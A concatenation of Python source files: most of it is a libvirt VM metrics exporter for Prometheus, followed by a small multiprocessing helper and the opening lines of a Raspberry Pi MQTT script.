actual_size = float(output.get('actual-size')) / 1024 if output.get('actual-size') else 0.00
storage_disk_total_size_kilobytes.labels(zone, HOSTNAME, pool_mount_point, disk_type, disk).set(virtual_size)
storage_disk_used_size_kilobytes.labels(zone, HOSTNAME, pool_mount_point, disk_type, disk).set(actual_size)
def runCmdAndGetOutput(cmd):
if not cmd:
return
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
msg = ''
for line in std_out:
msg = msg + line
return msg
if std_err:
return ''
except Exception:
return ''
finally:
p.stdout.close()
p.stderr.close()
def get_disks_spec(domain):
output = runCmdAndGetOutput('virsh domblklist %s' % domain)
lines = output.splitlines()
specs = []
for i in range(2, len(lines)):
spec = []
kv = lines[i].split()
if len(kv) == 2:
spec.append(kv[0])
spec.append(kv[1])
specs.append(spec)
return specs
def list_active_vms():
output = runCmdAndGetOutput('virsh list')
lines = output.splitlines()
if (len(lines) < 2):
return []
vms = []
for line in lines[2:]:
if (len(line.split()) == 3):
vms.append(line.split()[1])
return vms
def list_all_vms():
output = runCmdAndGetOutput('virsh list --all')
lines = output.splitlines()
if (len(lines) < 2):
return []
vms = []
for line in lines[2:]:
if (len(line.split()) >= 1):
vms.append(line.split()[1])
return vms
def get_macs(vm):
if not vm:
return []
lines = runCmdRaiseException('timeout 2 virsh domiflist %s | awk \'NR>2{print $5}\'' % (vm))
# for child in root:
# print(child.tag, "----", child.attrib)
macs = []
for line in lines:
line = line.strip()
if line:
macs.append(line)
return macs
def collect_vm_metrics(zone):
try:
global ALL_VMS_IN_PROMETHEUS
vm_list = list_active_vms()
all_vm = list_all_vms()
vm_not_exists = []
if ALL_VMS_IN_PROMETHEUS:
vm_not_exists = list(set(ALL_VMS_IN_PROMETHEUS).difference(set(all_vm)))
ALL_VMS_IN_PROMETHEUS = all_vm
# global VMS_CACHE
vm_stopped = []
# if VMS_CACHE:
# print(all_vm)
# print(vm_list)
# print(vm_not_exists)
threads = []
if all_vm:
vm_stopped = list(set(all_vm).difference(set(vm_list)))
for vm in vm_list:
# t = threading.Thread(target=get_vm_metrics,args=(vm, zone,))
t = threadpool.makeRequests(get_vm_metrics, [((vm, zone),{})])
threads.extend(t)
for vm in vm_stopped:
# t = threading.Thread(target=zero_vm_metrics,args=(vm, zone,))
t = threadpool.makeRequests(zero_vm_metrics, [((vm, zone),{})])
threads.extend(t)
for vm in vm_not_exists:
# t = threading.Thread(target=delete_vm_metrics,args=(vm, zone,))
t = threadpool.makeRequests(delete_vm_metrics, [((vm, zone),{})])
threads.extend(t)
# for thread in threads:
# thread.setDaemon(True)
# thread.start()
map(thread_pool.putRequest,threads)
thread_pool.wait()
except:
logger.warning('Oops! ', exc_info=1)
return
# get_vm_metrics(vm, zone)
def get_vm_metrics(vm, zone):
try:
global LAST_TAGS
global LAST_RESOURCE_UTILIZATION
# delete_duplicated_data = False
# tags = {}
config.load_kube_config(config_file=TOKEN)
labels = get_field_in_kubernetes_by_index(vm, GROUP, VERSION, PLURAL, ['metadata', 'labels'])
this_tags = {'zone': zone, 'host': HOSTNAME, 'owner': labels.get('owner'),
"router": labels.get('router'), "autoscalinggroup": labels.get('autoscalinggroup'),
"cluster": labels.get('cluster')}
if vm in LAST_TAGS.keys() and operator.ne(LAST_TAGS[vm], this_tags):
# print("need delete")
delete_vm_metrics(vm, LAST_TAGS[vm].get('zone'))
# delete_duplicated_data = True
# tags = {'zone': LAST_TAGS[vm].get('zone'), 'host': LAST_TAGS[vm].get('host'), 'owner': LAST_TAGS[vm].get('owner'),
# "router": LAST_TAGS[vm].get('router'), "autoscalinggroup": LAST_TAGS[vm].get('autoscalinggroup'),
# "cluster": LAST_TAGS[vm].get('cluster'), 'vm': vm}
# labels_str = dumps(labels)
# if delete_duplicated_data:
LAST_TAGS[vm] = this_tags
resource_utilization = {'vm': vm, 'cpu_metrics': {}, 'mem_metrics': {},
'disks_metrics': [], 'networks_metrics': [], 'cluster': labels.get('cluster'), 'router': labels.get('router'),
'owner': labels.get('owner'), 'autoscalinggroup': labels.get('autoscalinggroup')}
# cpus = len(get_vcpus(vm)[0])
# print(cpus)
cpu_stats = runCmdRaiseException('timeout 2 virsh domstats --vcpu %s | grep time | awk \'{split($0,a,\"=\");print a[2]}\'' % vm)
cpu_time = 0.00
cpu_number = 0
for line in cpu_stats:
one_cpu_time_seconds = int(line) / 1000000000
cpu_time += one_cpu_time_seconds
cpu_number += 1
# cpu_system_time = 0.00
# cpu_user_time = 0.00
# for line in cpu_stats:
# if line.find('cpu_time') != -1:
# p1 = r'^(\s*cpu_time\s*)([\S*]+)\s*(\S*)'
# m1 = re.match(p1, line)
# if m1:
# cpu_time = float(m1.group(2))
# elif line.find('system_time') != -1:
# p1 = r'^(\s*system_time\s*)([\S*]+)\s*(\S*)'
# m1 = re.match(p1, line)
# if m1:
# cpu_system_time = float(m1.group(2))
# elif line.find('user_time') != -1:
# p1 = r'^(\s*user_time\s*)([\S*]+)\s*(\S*)'
# m1 = re.match(p1, line)
# if m1:
# cpu_user_time = float(m1.group(2))
first_time = False
cpu_util = 0.00
global CPU_UTILIZATION
# logger.debug(vm)
if vm in CPU_UTILIZATION.keys() and cpu_number == CPU_UTILIZATION[vm].get('cpu_number'):
interval = time.time() - CPU_UTILIZATION[vm].get('time')
cpu_util = (cpu_time - float(CPU_UTILIZATION[vm].get('cpu_time')))/ cpu_number / interval
# logger.debug('%.2f %.2f %.2f %.2f' % (interval, cpu_util, cpu_system_util, cpu_user_util))
# logger.debug(CPU_UTILIZATION[vm], cpu_number, cpu_time, interval)
CPU_UTILIZATION[vm] = {'cpu_time': cpu_time,
'time': time.time(), 'cpu_number': cpu_number}
else:
CPU_UTILIZATION[vm] = {'cpu_time': cpu_time, 'time': time.time(), 'cpu_number': cpu_number}
first_time = True
if not first_time:
resource_utilization['cpu_metrics']['cpu_idle_rate'] = \
'%.2f' % abs(1 - cpu_util) if abs(1 - cpu_util) <= 1.00 and abs(1 - cpu_util) >= 0.00 else 0.00
else:
resource_utilization['cpu_metrics']['cpu_idle_rate'] = '%.2f' % (1.00)
# logger.debug(resource_utilization['cpu_metrics'])
mem_stats = runCmdRaiseException('timeout 2 virsh dommemstat %s' % vm)
mem_actual = 0.00
mem_unused = 0.00
mem_available = 0.00
for line in mem_stats:
if line.find('unused') != -1:
mem_unused = float(line.split(' ')[1].strip()) * 1024
elif line.find('available') != -1:
mem_available = float(line.split(' ')[1].strip()) * 1024
elif line.find('actual') != -1:
mem_actual = float(line.split(' ')[1].strip()) * 1024
resource_utilization['mem_metrics']['mem_unused'] = '%.2f' % (mem_unused)
resource_utilization['mem_metrics']['mem_available'] = '%.2f' % (mem_available)
if mem_unused and mem_available and mem_actual:
mem_buffers = abs(mem_actual - mem_available)
resource_utilization['mem_metrics']['mem_buffers'] = '%.2f' % (mem_buffers)
resource_utilization['mem_metrics']['mem_rate'] = \
'%.2f' % (abs(mem_available - mem_unused - mem_buffers) / mem_available * 100)
else:
resource_utilization['mem_metrics']['mem_buffers'] = '%.2f' % (0.00)
resource_utilization['mem_metrics']['mem_rate'] = '%.2f' % (0.00)
disks_spec = get_disks_spec(vm)
for disk_spec in disks_spec:
disk_metrics = {}
disk_device = disk_spec[0]
disk_metrics['device'] = disk_device
stats1 = {}
stats2 = {}
# logger.debug('virsh domblkstat --device %s --domain %s' % (disk_device, vm))
blk_dev_stats1 = runCmdRaiseException('timeout 2 virsh domblkstat --device %s --domain %s' % (disk_device, vm))
t1 = time.time()
for line in blk_dev_stats1:
if line.find('rd_req') != -1:
stats1['rd_req'] = float(line.split(' ')[2].strip())
elif line.find('rd_bytes') != -1:
stats1['rd_bytes'] = float(line.split(' ')[2].strip())
elif line.find('wr_req') != -1:
stats1['wr_req'] = float(line.split(' ')[2].strip())
elif line.find('wr_bytes') != -1:
stats1['wr_bytes'] = float(line.split(' ')[2].strip())
time.sleep(0.1)
blk_dev_stats2 = runCmdRaiseException('timeout 2 virsh domblkstat --device %s --domain %s' % (disk_device, vm))
t2 = time.time()
interval = t2 - t1
for line in blk_dev_stats2:
if line.find('rd_req') != -1:
stats2['rd_req'] = float(line.split(' ')[2].strip())
elif line.find('rd_bytes') != -1:
stats2['rd_bytes'] = float(line.split(' ')[2].strip())
elif line.find('wr_req') != -1:
stats2['wr_req'] = float(line.split(' ')[2].strip())
elif line.find('wr_bytes') != -1:
stats2['wr_bytes'] = float(line.split(' ')[2].strip())
disk_metrics['disk_read_requests_per_secend'] = '%.2f' % ((stats2['rd_req'] - stats1['rd_req']) / interval) \
if (stats2['rd_req'] - stats1['rd_req']) > 0 else '%.2f' % (0.00)
disk_metrics['disk_read_bytes_per_secend'] = '%.2f' % ((stats2['rd_bytes'] - stats1['rd_bytes']) / interval) \
if (stats2['rd_bytes'] - stats1['rd_bytes']) > 0 else '%.2f' % (0.00)
disk_metrics['disk_write_requests_per_secend'] = '%.2f' % ((stats2['wr_req'] - stats1['wr_req']) / interval) \
if (stats2['wr_req'] - stats1['wr_req']) > 0 else '%.2f' % (0.00)
disk_metrics['disk_write_bytes_per_secend'] = '%.2f' % ((stats2['wr_bytes'] - stats1['wr_bytes']) / interval) \
if (stats2['wr_bytes'] - stats1['wr_bytes']) > 0 else '%.2f' % (0.00)
resource_utilization['disks_metrics'].append(disk_metrics)
macs = get_macs(vm)
for mac in macs:
# logger.debug(mac)
net_metrics = {}
net_metrics['device'] = mac.encode('utf-8')
stats1 = {}
stats2 = {}
net_dev_stats1 = runCmdRaiseException('timeout 2 virsh domifstat --interface %s --domain %s' % (mac, vm))
t1 = time.time()
for line in net_dev_stats1:
if line.find('rx_bytes') != -1:
stats1['rx_bytes'] = float(line.split(' ')[2].strip())
elif line.find('rx_packets') != -1:
stats1['rx_packets'] = float(line.split(' ')[2].strip())
elif line.find('tx_packets') != -1:
stats1['tx_packets'] = float(line.split(' ')[2].strip())
elif line.find('tx_bytes') != -1:
stats1['tx_bytes'] = float(line.split(' ')[2].strip())
elif line.find('rx_drop') != -1:
stats1['rx_drop'] = float(line.split(' ')[2].strip())
elif line.find('rx_errs') != -1:
stats1['rx_errs'] = float(line.split(' ')[2].strip())
elif line.find('tx_errs') != -1:
stats1['tx_errs'] = float(line.split(' ')[2].strip())
elif line.find('tx_drop') != -1:
stats1['tx_drop'] = float(line.split(' ')[2].strip())
# logger.debug(stats1)
time.sleep(0.1)
net_dev_stats2 = runCmdRaiseException('timeout 2 virsh domifstat --interface %s --domain %s' % (mac, vm))
t2 = time.time()
interval = t2 - t1
for line in net_dev_stats2:
if line.find('rx_bytes') != -1:
stats2['rx_bytes'] = float(line.split(' ')[2].strip())
elif line.find('rx_packets') != -1:
stats2['rx_packets'] = float(line.split(' ')[2].strip())
elif line.find('tx_packets') != -1:
stats2['tx_packets'] = float(line.split(' ')[2].strip())
elif line.find('tx_bytes') != -1:
stats2['tx_bytes'] = float(line.split(' ')[2].strip())
elif line.find('rx_drop') != -1:
stats2['rx_drop'] = float(line.split(' ')[2].strip())
elif line.find('rx_errs') != -1:
stats2['rx_errs'] = float(line.split(' ')[2].strip())
elif line.find('tx_errs') != -1:
stats2['tx_errs'] = float(line.split(' ')[2].strip())
elif line.find('tx_drop') != -1:
stats2['tx_drop'] = float(line.split(' ')[2].strip())
# logger.debug(stats2)
net_metrics['network_read_packages_per_secend'] = '%.2f' % ((stats2['rx_packets'] - stats1['rx_packets']) / interval) \
if (stats2['rx_packets'] - stats1['rx_packets']) > 0 else '%.2f' % (0.00)
net_metrics['network_read_bytes_per_secend'] = '%.2f' % ((stats2['rx_bytes'] - stats1['rx_bytes']) / interval) \
if (stats2['rx_bytes'] - stats1['rx_bytes']) > 0 else '%.2f' % (0.00)
net_metrics['network_write_packages_per_secend'] = '%.2f' % ((stats2['tx_packets'] - stats1['tx_packets']) / interval) \
if (stats2['tx_packets'] - stats1['tx_packets']) > 0 else '%.2f' % (0.00)
net_metrics['network_write_bytes_per_secend'] = '%.2f' % ((stats2['tx_bytes'] - stats1['tx_bytes']) / interval) \
if (stats2['tx_bytes'] - stats1['tx_bytes']) > 0 else '%.2f' % (0.00)
net_metrics['network_read_errors_per_secend'] = '%.2f' % ((stats2['rx_errs'] - stats1['rx_errs']) / interval) \
if (stats2['rx_errs'] - stats1['rx_errs']) > 0 else '%.2f' % (0.00)
net_metrics['network_read_drops_per_secend'] = '%.2f' % ((stats2['rx_drop'] - stats1['rx_drop']) / interval) \
if (stats2['rx_drop'] - stats1['rx_drop']) > 0 else '%.2f' % (0.00)
net_metrics['network_write_errors_per_secend'] = '%.2f' % ((stats2['tx_errs'] - stats1['tx_errs']) / interval) \
if (stats2['tx_errs'] - stats1['tx_errs']) > 0 else '%.2f' % (0.00)
net_metrics['network_write_drops_per_secend'] = '%.2f' % ((stats2['tx_drop'] - stats1['tx_drop']) / interval) \
if (stats2['tx_drop'] - stats1['tx_drop']) > 0 else '%.2f' % (0.00)
resource_utilization['networks_metrics'].append(net_metrics)
# logger.debug(net_metrics)
LAST_RESOURCE_UTILIZATION[vm] = resource_utilization
if cpu_number == CPU_UTILIZATION[vm].get('cpu_number'):
vm_cpu_idle_rate.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['cpu_metrics']['cpu_idle_rate'])
vm_mem_total_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_available'])
vm_mem_available_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_unused'])
vm_mem_buffers_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_buffers'])
vm_mem_rate.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_rate'])
for disk_metrics in resource_utilization['disks_metrics']:
vm_disk_read_requests_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_read_requests_per_secend'])
vm_disk_read_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_read_bytes_per_secend'])
vm_disk_write_requests_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_write_requests_per_secend'])
vm_disk_write_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_write_bytes_per_secend'])
for net_metrics in resource_utilization['networks_metrics']:
vm_network_receive_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_bytes_per_secend'])
vm_network_receive_drops_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_drops_per_secend'])
vm_network_receive_errors_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_errors_per_secend'])
vm_network_receive_packages_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_packages_per_secend'])
vm_network_send_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_bytes_per_secend'])
vm_network_send_drops_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_drops_per_secend'])
vm_network_send_errors_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_errors_per_secend'])
vm_network_send_packages_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_packages_per_secend'])
return resource_utilization
except Exception as e:
raise e
def delete_vm_metrics(vm, zone):
global LAST_TAGS
global LAST_RESOURCE_UTILIZATION
if vm in LAST_TAGS.keys() and vm in LAST_RESOURCE_UTILIZATION.keys():
tags = LAST_TAGS[vm]
disk_metrics = LAST_RESOURCE_UTILIZATION[vm]['disks_metrics']
network_metrics = LAST_RESOURCE_UTILIZATION[vm]['networks_metrics']
# zone = tags.get('zone')
host = tags.get('host')
# vm = tags.get('vm')
owner = tags.get('owner')
router = tags.get('router')
autoscalinggroup = tags.get('autoscalinggroup')
cluster = tags.get('cluster')
vm_cpu_idle_rate.remove(zone, host, vm, owner, router, autoscalinggroup, cluster)
vm_mem_total_bytes.remove(zone, host, vm, owner, router, autoscalinggroup, cluster)
vm_mem_available_bytes.remove(zone, host, vm, owner, router, autoscalinggroup, cluster)
vm_mem_buffers_bytes.remove(zone, host, vm, owner, router, autoscalinggroup, cluster)
vm_mem_rate.remove(zone, host, vm, owner, router, autoscalinggroup, cluster)
for disks in disk_metrics:
vm_disk_read_requests_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, disks['device'])
vm_disk_read_bytes_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, disks['device'])
vm_disk_write_requests_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, disks['device'])
vm_disk_write_bytes_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, disks['device'])
for nets in network_metrics:
vm_network_receive_bytes_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_receive_drops_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_receive_errors_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_receive_packages_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_send_bytes_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_send_drops_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_send_errors_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_send_packages_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
del LAST_TAGS[vm]
del LAST_RESOURCE_UTILIZATION[vm]
else:
logger.warning('failed to delete vm %s data' % vm)
print('failed to delete vm %s data' % vm)
def zero_vm_metrics(vm, zone):
config.load_kube_config(config_file=TOKEN)
labels = get_field_in_kubernetes_by_index(vm, GROUP, VERSION, PLURAL, ['metadata', 'labels'])
# labels_str = dumps(labels)
resource_utilization = {'vm': vm, 'cpu_metrics': {}, 'mem_metrics': {},
'disks_metrics': [], 'networks_metrics': [], 'cluster': labels.get('cluster'), 'router': labels.get('router'),
'owner': labels.get('owner'), 'autoscalinggroup': labels.get('autoscalinggroup')}
resource_utilization['cpu_metrics']['cpu_idle_rate'] = '%.2f' % (1.00)
mem_unused = 0.00
mem_available = 0.00
resource_utilization['mem_metrics']['mem_unused'] = '%.2f' % (mem_unused)
resource_utilization['mem_metrics']['mem_available'] = '%.2f' % (mem_available)
resource_utilization['mem_metrics']['mem_buffers'] = '%.2f' % (0.00)
resource_utilization['mem_metrics']['mem_rate'] = '%.2f' % (0.00)
disks_spec = get_disks_spec(vm)
for disk_spec in disks_spec:
disk_metrics = {}
disk_device = disk_spec[0]
disk_metrics['device'] = disk_device
disk_metrics['disk_read_requests_per_secend'] = '%.2f' % (0.00)
disk_metrics['disk_read_bytes_per_secend'] = '%.2f' % (0.00)
disk_metrics['disk_write_requests_per_secend'] = '%.2f' % (0.00)
disk_metrics['disk_write_bytes_per_secend'] = '%.2f' % (0.00)
resource_utilization['disks_metrics'].append(disk_metrics)
macs = get_macs(vm)
for mac in macs:
net_metrics = {}
net_metrics['device'] = mac.encode('utf-8')
net_metrics['network_read_packages_per_secend'] = '%.2f' % (0.00)
net_metrics['network_read_bytes_per_secend'] = '%.2f' % (0.00)
net_metrics['network_write_packages_per_secend'] = '%.2f' % (0.00)
net_metrics['network_write_bytes_per_secend'] = '%.2f' % (0.00)
net_metrics['network_read_errors_per_secend'] = '%.2f' % (0.00)
net_metrics['network_read_drops_per_secend'] = '%.2f' % (0.00)
net_metrics['network_write_errors_per_secend'] = '%.2f' % (0.00)
net_metrics['network_write_drops_per_secend'] = '%.2f' % (0.00)
resource_utilization['networks_metrics'].append(net_metrics)
vm_cpu_idle_rate.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['cpu_metrics']['cpu_idle_rate'])
vm_mem_total_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_available'])
vm_mem_available_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_unused'])
vm_mem_buffers_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_buffers'])
vm_mem_rate.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_rate'])
for disk_metrics in resource_utilization['disks_metrics']:
vm_disk_read_requests_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_read_requests_per_secend'])
vm_disk_read_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_read_bytes_per_secend'])
vm_disk_write_requests_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_write_requests_per_secend'])
vm_disk_write_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_write_bytes_per_secend'])
for net_metrics in resource_utilization['networks_metrics']:
vm_network_receive_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_bytes_per_secend'])
vm_network_receive_drops_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_drops_per_secend'])
vm_network_receive_errors_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_errors_per_secend'])
vm_network_receive_packages_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_packages_per_secend'])
vm_network_send_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_bytes_per_secend'])
vm_network_send_drops_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_drops_per_secend'])
vm_network_send_errors_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_errors_per_secend'])
vm_network_send_packages_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_packages_per_secend'])
return resource_utilization
# def set_vm_mem_period(vm, sec):
# runCmdRaiseException('virsh dommemstat --period %s --domain %s --config --live' % (str(sec), vm))
# def get_resource_collector_threads():
# config.load_kube_config(config_file=TOKEN)
# zone = get_field_in_kubernetes_node(HOSTNAME, ['metadata', 'labels', 'zone'])
# print(zone)
# while True:
# vm_list = list_active_vms()
# for vm in vm_list:
# t = threading.Thread(target=collect_vm_metrics,args=(vm,zone,))
# t.setDaemon(True)
# t.start()
# t1 = threading.Thread(target=collect_storage_metrics,args=(zone,))
# t1.setDaemon(True)
# t1.start()
# # nfs_vdisk_list = list_all_vdisks('/var/lib/libvirt/cstor')
# # for nfs_vdisk in nfs_vdisk_list:
# # t2 = threading.Thread(target=collect_disk_metrics,args=(nfs_vdisk,zone,))
# # t2.setDaemon(True)
# # t2.start()
# time.sleep(5)
@singleton('/var/run/virt_monitor_in_docker.pid')
def main():
# logger.debug("---------------------------------------------------------------------------------")
# logger.debug("------------------------Welcome to Monitor Daemon.-------------------------------")
# logger.debug("------Copyright (2019, ) Institute of Software, Chinese Academy of Sciences------")
# logger.debug("---------author: wuyuewen@otcaix.iscas.ac.cn,liuhe18@otcaix.iscas.ac.cn----------")
# logger.debug("--------------------------------wuheng@otcaix.iscas.ac.cn------------------------")
# logger.debug("---------------------------------------------------------------------------------")
if os.path.exists(TOKEN):
start_http_server(19998)
# registry = CollectorRegistry(auto_describe=False)
config.load_kube_config(config_file=TOKEN)
zone = get_field_in_kubernetes_node(HOSTNAME, ['metadata', 'labels', 'zone'])
while True:
# init(registry)
config.load_kube_config(config_file=TOKEN)
collect_vm_metrics(zone)
# collect_storage_metrics(zone)
time.sleep(10)
if __name__ == '__main__':
main()
# start_http_server(19998)
# config.load_kube_config(config_file=TOKEN)
# zone = get_field_in_kubernetes_node(HOSTNAME, ['metadata', 'labels', 'zone'])
# while True:
# collect_vm_metrics(zone)
# # collect_storage_metrics(zone)
# time.sleep(10)
# print(get_macs("vm006"))
# print get_disks_spec('vmtest222')
# import pprint
# set_vm_mem_period('vm010', 5)
# pprint.pprint(collect_vm_metrics("vm010"))
|
mutiprocessing_util.py
|
from multiprocessing import Process, Manager
import numpy as np
import os
import inspect
class MutiProcessor():
def __init__(self, np_data, h_num=1, w_num=1, cube_func=None):
if len(np_data.shape) < 2:
raise Exception("np_data must at least have dim 2.")
self.np_data = np_data
self.h_size, self.w_size = np_data.shape[:2]
print(">>>>>>>-- self.h_size", self.h_size, ", self.w_size=", self.w_size)
if h_num > self.h_size or w_num > self.w_size:
raise Exception("h_num or w_num must at less then np_data shape {}. but got {}".format(np_data.shape[:2], (h_num, w_num)))
self.h_num, self.w_num = h_num, w_num
print(">>>>>>>-- self.h_num", self.h_num, ", self.w_num=", self.w_num)
self.h_step, self.w_step = self.h_size // self.h_num, self.w_size // self.w_num
print(">>>>>>>-- self.h_step", self.h_step, ", self.w_step=", self.w_step)
self.__cube_func = cube_func
self.__ret_dict = Manager().dict()
def __get_location(self, i, j):
start_h, end_h = i * self.h_step, (i + 1) * self.h_step
start_w, end_w = j * self.w_step, (j + 1) * self.w_step
end_h = end_h if end_h < self.h_size else self.h_size
end_w = end_w if end_w < self.w_size else self.w_size
return (start_h, start_w, end_h, end_w)
def __cube_process(self, i, j):
start_h, start_w, end_h, end_w = self.__get_location(i, j)
cube_input = self.np_data[start_h:end_h, start_w:end_w]
print(">>>>>>>>>__cube_process: ({},{}) = {} start...".format(i, j, cube_input.shape))
cube_output = None
if self.__cube_func:
func_args = inspect.getfullargspec(self.__cube_func).args
if len(func_args) == 1:
cube_output = self.__cube_func(cube_input)
elif len(func_args) == 2:
cube_output = self.__cube_func(cube_input, (start_h, start_w, end_h, end_w))
else:
raise Exception("args num invalid." + str(func_args))
print(">>>>>>>>>__cube_process: ({},{}) = {} end.".format(i, j, cube_output.shape if cube_output is not None else None))
key = "_".join([str(x) for x in (start_h, start_w, end_h, end_w)])
self.__ret_dict[key] = cube_output
def process(self):
_process_list = []
for i in range(self.h_num):
for j in range(self.w_num):
p = Process(target=self.__cube_process, args=(i, j))
p.start()
_process_list.append(p)
for p in _process_list:
p.join()
return self.__ret_dict
if __name__ == 'main':
img_np = np.arange(10000).reshape(100, 100)
def cube_func(cube_input, locs):
pass
processor = MutiProcessor(img_np, h_num=5, w_num=5, cube_func=gray2RGB)
ret = processor.process()
|
tomasan.py
|
#!/usr/bin/env python
# coding=utf-8
# ======== 受信発信両用 =========
import os, sys
import RPi.GPIO as GPIO
import paho.mqtt.client as paho
import paho.mqtt.publish as publish
import threading
import time
import pygame.mixer
import wave
import time
import json
time.sleep(0.3)
GPIO.cleanup()
time.sleep(0.3)
# ======= 設定 ==============
# 設定
SETTING_FILE = "/home/pi/project1/setting.json"
#SETTING_FILE = os.abspath.dirname(__file__) + "/setting.json"
